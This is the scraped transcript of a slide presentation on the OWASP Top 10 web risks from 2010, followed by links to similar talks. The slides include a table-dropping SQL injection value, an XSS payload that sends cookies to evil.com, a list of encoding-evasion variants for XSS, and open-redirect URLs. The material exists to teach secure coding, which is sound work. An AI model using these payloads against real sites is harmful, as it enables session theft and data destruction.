Presentation is loading. Please wait.

Presentation is loading. Please wait.

OWASP OWASP top 10 - Agenda  Background  Risk based  Top 10 items 1 – 6  Live demo  Top 10 items 7 – 10  OWASP resources.

Published byEustace Freeman Modified over 9 years ago

Similar presentations

Presentation on theme: "OWASP OWASP top 10 - Agenda  Background  Risk based  Top 10 items 1 – 6  Live demo  Top 10 items 7 – 10  OWASP resources."— Presentation transcript:

1 OWASP OWASP top 10 - Agenda  Background  Risk based  Top 10 items 1 – 6  Live demo  Top 10 items 7 – 10  OWASP resources

2 OWASP The OWASP Guide

3 OWASP Threat Agent Attack Vector Weakness Prevalence Weakness Detectability Technical Impact Business Impact ? EasyWidespreadEasySevere ? AverageCommonAverageModerate DifficultUncommonDifficultMinor

4 OWASP Warning  Risk analysis  Insiders  Architecture  Modular  Clarity  SDLC  Knowledge  Predictability

5 OWASP Top 10 - 2010 1.Injection 2.Cross site scripting (XSS) 3.Broken authentication and session management 4.Insecure direct object reference 5.Cross site request forgery (CSRF) 6.Security missconfiguration 7.Insecure cryptograpic storage 8.Failure to restrict URL access 9.Insufficient transoport layer protection 10.Unvalidated redirects and forwards

6 OWASP A1 – Injection ClientAppl DB Shell PgmCPU

7 OWASP A1 – Injection String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'"; id="foo';DROP accnts;--" SELECT * FROM accnts WHERE ID='foo';DROP accnts;--'; id="foo" SELECT * FROM accnts WHERE ID='foo';

8 OWASP A2 - Cross site scripting (XSS) Browser ApplDB

9 OWASP A2 - Cross site scripting (XSS) (String) page += " "; CC=123456789"> window.location=http://evil.com? x=document.cookie window.location=http://evil.com?x=document.cookie '> CC=“123456789"

10 OWASP A2 - Cross site scripting (XSS) &#x003c &#X3c &#x3C 000003C; \x3c \x3C \u003c \u003C < %3C &lt < &LT &LT; &#60 &#060 < <img src=http://site.com onmoseover= <body onload=

11 OWASP A3 - Broken authentication and session mngmnt  Unpredictable passwords, sessions-ID, security- questions  No sessions-id/credentials i URL  Avoid session-fixation  Time out of sessions & logout buttons  Different sessions id outside/inside TLS  No clear text passwords

12 OWASP A4 - Insecure direct object references 2010q1 2011q2 period=2011q3 period=2011q2

13 OWASP A5 - Cross-site request forgery (CSRF)

14 OWASP A6 - Security missconfiguration  Patching  OS  Application  Frameworks / libraries  Disable unnecessary services  Stack traces  Configuration

15 OWASP A7 - Insecure cryptographig storage  Keep track on sensitive data  Password one-way-hashed & salted  Password/Key management  TLS key pass phrase  M2M lösenord (obfuscation)

16 OWASP A8 - Failure to restrict URL access /user/getAccounts /admin/getAccounts

17 OWASP A9 - Insufficient transport layer protection  Use SSL/TLS  No mixed content  Use secure cookies  Example FireSheep exploits poor solutions

18 OWASP A10 - Unvalidated redirects and forwards  http://www.vuln.com/redir.asp?=http://www.lin ks.com http://www.vuln.com/redir.asp?=http://www.lin ks.com  http://%77%77%77%2E%67%6F%6F%67%6C %65%2E%63%6F%6D http://%77%77%77%2E%67%6F%6F%67%6C %65%2E%63%6F%6D

19 OWASP OWASP resurser  OWASP Secure Software Contract Annex OWASP Secure Software Contract Annex  OWASP Developer’s Guide OWASP Developer’s Guide  OWASP Enterprise Security API (ESAPI) OWASP Enterprise Security API (ESAPI)  OWASP Software Assurance Maturity Model (SAMM) OWASP Software Assurance Maturity Model (SAMM)  OWASP WebGoat OWASP WebGoat

Download ppt "OWASP OWASP top 10 - Agenda  Background  Risk based  Top 10 items 1 – 6  Live demo  Top 10 items 7 – 10  OWASP resources."

Similar presentations

Webgoat.

Webgoat.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Don’t Teach Developers Security Caleb Sima Armorize Technologies.

Don’t Teach Developers Security Caleb Sima Armorize Technologies.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
OWASP Web Vulnerabilities and Auditing

OWASP Web Vulnerabilities and Auditing
OWASP Top-10 2013 Dave Wichers OWASP Top 10 Project Lead OWASP Board Member Cofounder, Aspect Security & Contrast Security.

OWASP Top Dave Wichers OWASP Top 10 Project Lead OWASP Board Member Cofounder, Aspect Security & Contrast Security.
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
SEC835 OWASP Top Ten Project.

SEC835 OWASP Top Ten Project.
The OWASP Foundation OWASP Top 10 2010 Kuai Hinojosa Software Security Consultant at Cigital OWASP Global Education Committee OWASP.

The OWASP Foundation OWASP Top Kuai Hinojosa Software Security Consultant at Cigital OWASP Global Education Committee OWASP.
The Web Hacking Incident Database (WHID) Report for 2010 Ryan Barnett WASC WHID Project Leader Senior Security Researcher.

The Web Hacking Incident Database (WHID) Report for 2010 Ryan Barnett WASC WHID Project Leader Senior Security Researcher.
A Demo of and Preventing XSS in.NET Applications.

A Demo of and Preventing XSS in.NET Applications.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Solving Real-World Problems with an Enterprise Security API (ESAPI) Chris Schmidt ESAPI Project Manager ESAPI4JS Project Owner Application Security Engineer.

Solving Real-World Problems with an Enterprise Security API (ESAPI) Chris Schmidt ESAPI Project Manager ESAPI4JS Project Owner Application Security Engineer.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
The 10 Most Critical Web Application Security Vulnerabilities

The 10 Most Critical Web Application Security Vulnerabilities
Glass Box Testing: Thinking Inside the Box Omri Weisman Manager, Security Research Group IBM Rational.

Glass Box Testing: Thinking Inside the Box Omri Weisman Manager, Security Research Group IBM Rational.
By: Razieh Rezaei Saleh.  Security Evaluation The examination of a system to determine its degree of compliance with a stated security model, security.

By: Razieh Rezaei Saleh.  Security Evaluation The examination of a system to determine its degree of compliance with a stated security model, security.

Similar presentations

Ads by Google